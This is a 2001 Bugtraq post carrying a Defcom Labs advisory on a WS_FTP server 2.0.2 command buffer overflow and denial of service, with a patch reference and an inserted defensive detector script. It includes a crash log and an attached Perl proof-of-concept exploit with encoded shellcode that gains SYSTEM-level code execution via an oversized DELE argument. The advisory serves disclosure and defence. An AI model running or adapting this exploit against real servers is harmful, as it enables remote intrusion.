[21881] in bugtraq
def-2001-28 - WS_FTP server 2.0.2 Buffer Overflow and possible DOS
daemon@ATHENA.MIT.EDU (andreas junestam)
Thu Jul 26 11:51:56 2001
Message-ID: <3B600C29.DADDFC63@defcom.com>
Date: Thu, 26 Jul 2001 13:25:13 +0100
From: andreas junestam <andreas.junestam@defcom.com>
MIME-Version: 1.0
To: bugtraq@securityfocus.com
Cc: Olle Segerdahl <olle@defcom.com>
======================================================================
Defcom Labs Advisory def-2001-28
WS_FTP server 2.0.2 Buffer Overflow and possible DOS
Author: Andreas Junestam <andreas@defcom.com>
Co-Author: Janne Sarendal <janne@defcom.com>
Release Date: 2001-07-26
======================================================================
------------------------=[Brief Description]=-------------------------
WS_FTP server 2.0.2 contains a buffer overflow which affects the
following commands:
* DELE
* MDTM
* MLST
* MKD
* RMD
* RNFR
* RNTO
* SIZE
* STAT
* XMKD
* XRMD
This buffer overflow gives an attacker the ability to run code on
the target with SYSTEM rights, because the server runs as a service
by default. Note: this only applies when logged in as an anonymous
user, not as an ordinary one.
The server also contains an easy-to-trigger DoS.
------------------------=[Affected Systems]=--------------------------
- WS_FTP server 2.0.2; haven't tested other versions
----------------------=[Detailed Description]=------------------------
* Command Buffer Overrun
All the above-mentioned commands seem to use the same parsing code,
which suffers from a buffer overflow. By sending a command with an
argument longer than 478 bytes (474 bytes + new return address), a
buffer overflows and EIP is overwritten. A proof-of-concept exploit
is attached to this advisory; it works against WS_FTP server 2.0.2
running on Win2K (Professional and Server, any SP).
C:\tools\web>nc -nvv 127.0.0.1 21
(UNKNOWN) [127.0.0.1] 21 (?) open
220-helig2 X2 WS_FTP Server 2.0.2.EVAL (48732520)
220-Tue Jun 19 14:00:21 2001
220-30 days remaining on evaluation.
220 helig2 X2 WS_FTP Server 2.0.2.EVAL (48732520)
user ftp
331 Password required
pass ftp
230 user logged in
DELE AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Access violation - code c0000005 (first chance)
eax=000000ea ebx=0067c278 ecx=000000ea edx=00000002 esi=0067c278 edi=77fca3e0
eip=41414141 esp=0104df88 ebp=41414141 iopl=0 nv up ei pl zr na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010246
* Possible DOS
By sending a couple of NULL (0x00) characters, the WS_FTP server
will spike to 100% CPU.
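A defender-side check for the two conditions described above, added here as an example (not part of the advisory or of Ipswitch's software): it walks the client side of one FTP control session, flags the listed commands whose argument exceeds the 474-byte buffer the advisory reports, rates that higher after an anonymous USER login, and flags NUL bytes in any command line. The session lines are constructed sample input, not captured traffic.

```python
import re

# Commands the advisory lists as sharing the vulnerable argument parser.
VULNERABLE_CMDS = {"DELE", "MDTM", "MLST", "MKD", "RMD", "RNFR",
                   "RNTO", "SIZE", "STAT", "XMKD", "XRMD"}
# Advisory: the buffer is 474 bytes; arguments above 478 overwrite EIP.
BUFFER_LEN = 474
ANON_USERS = {b"ftp", b"anonymous"}

# FTP verb of 3-4 letters, then an optional argument after whitespace.
_CMD_RE = re.compile(rb"^([A-Za-z]{3,4})(?:[ \t]+(.*))?$", re.DOTALL)


def parse_command(raw):
    """Split one client control-channel line into (VERB, argument bytes).
    Returns (None, line) when it does not look like an FTP command."""
    line = raw.rstrip(b"\r\n")
    m = _CMD_RE.match(line)
    if not m:
        return None, line
    return m.group(1).upper().decode("ascii"), m.group(2) or b""


def scan_session(lines):
    """Walk the client lines of one control session in order and return
    findings as (line_index, verb, reason, severity) tuples."""
    findings = []
    anonymous = False
    for i, raw in enumerate(lines):
        verb, arg = parse_command(raw)
        # NUL bytes never belong in a control-channel command; the advisory
        # reports that a few of them drive the server to 100% CPU.
        if b"\x00" in raw:
            findings.append((i, verb, "nul-bytes-in-command", "high"))
        if verb == "USER":
            anonymous = arg.strip().lower() in ANON_USERS
        if verb in VULNERABLE_CMDS and len(arg) > BUFFER_LEN:
            # The overflow is only reachable from an anonymous login, so
            # rate it above the same oversized argument from a named account.
            sev = "critical" if anonymous else "medium"
            findings.append((i, verb, "oversized-argument:%d" % len(arg), sev))
    return findings


# Constructed sample session: anonymous login, a normal DELE, an
# oversized DELE, then a line of NUL bytes.
SAMPLE_SESSION = [
    b"USER ftp\r\n",
    b"PASS ftp\r\n",
    b"DELE readme.txt\r\n",
    b"DELE " + b"A" * 500 + b"\r\n",
    b"\x00\x00\x00\r\n",
]
```

Feed it the client-to-server lines of a control connection (from a capture or a server log that records raw commands); the anonymous-login tracking only works when the USER command is in the same stream.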
---------------------------=[Workaround]=-----------------------------
Download the new version from:
http://www.ipswitch.com/Support/WS_FTP-Server/patch-upgrades.html
-----------------------------=[Exploit]=------------------------------
See attached file, ws_ftp.pl
-------------------------=[Vendor Response]=--------------------------
This issue was brought to the vendor's attention on the 18th of
June, 2001. A patch has been released.
======================================================================
This release was brought to you by Defcom Labs
labs@defcom.com www.defcom.com
======================================================================
Attachment: ws_ftp.pl (application/x-perl)
#!/usr/local/bin/perl
#########################################################################
#
# WS_FTP Server 2.0.2 DELE proof-of-concept exploit
# By andreas@defcom.com and janne@defcom.com (C)2001
#
#########################################################################
$login="ftp"; #username
$pass="ftp"; #password
#########################################################################
$ARGC=@ARGV;
if ($ARGC !=1) {
print "WS_FTP server 2.0.2 DELE proof-of-concept exploit\n";
print "It creates a file named defcom.iyd in the c-root\n";
print "(C)2001 andreas\@defcom.com\n";
print "Usage: $0 <host>\n";
print "Example: $0 127.0.0.1\n";
exit;
}
use Socket;
my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port = "21";
$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";
socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";
sleep(1);
$msg = "user $login\n";
send(SOCK, $msg, 0) or die "Cannot send query: $!";
$msg = "pass $pass\n";
sleep(1);
send(SOCK, $msg, 0) or die "Cannot send query: $!";
$sploit = "\x8b\xd8\x8b\xf8\x83\xc0\x18\x33\xc9\x66\xb9\x42\x81\x66\x81\xf1\x80\x80\x80\x30\x95\x40\xe2\xfa\xde\x1e\x76";
$sploit = $sploit . "\x1e\x7e\x2e\x95\x6f\x95\x95\xc6\xfd\xd5\x95\x95\x95\x2b\x49\x81\xd0\x95\x6a\x83\x96\x56\x1e\x75\x1e\x7d\xa6\x55";
$sploit = $sploit . "\xc5\xfd\x15\x95\x95\x95\xff\x97\xc5\xc5\xfd\x95\x95\x95\x85\x14\x52\x59\x94\x95\x95\xc2\x2b\xb1\x80\xd0\x95";
$sploit = $sploit . "\x6a\x83\xc5\x2b\x6d\x81\xd0\x95\x6a\x83\xa6\x55\xc5\x2b\x85\x83\xd0\x95\x6a\x83";
$msg = "dele " . $sploit . "\xd4" x (460-length($sploit)) . "\xf6\xaf\xc9\xf1\xf0\xf3\xf6\xfa\xf8\xbb\xfc\xec\xf1\x95";
$msg = $msg . "\xab\xa3\x54\x77" . "\xd4" x 16 . "\x8b\xc4\x83\xe8\x7f\x83\xe8\x7f\x83\xe8\x7f\x83\xe8\x71\xff\xe0\n";
print $msg;
sleep(1);
send(SOCK, $msg, 0) or die "Cannot send query: $!";
exit;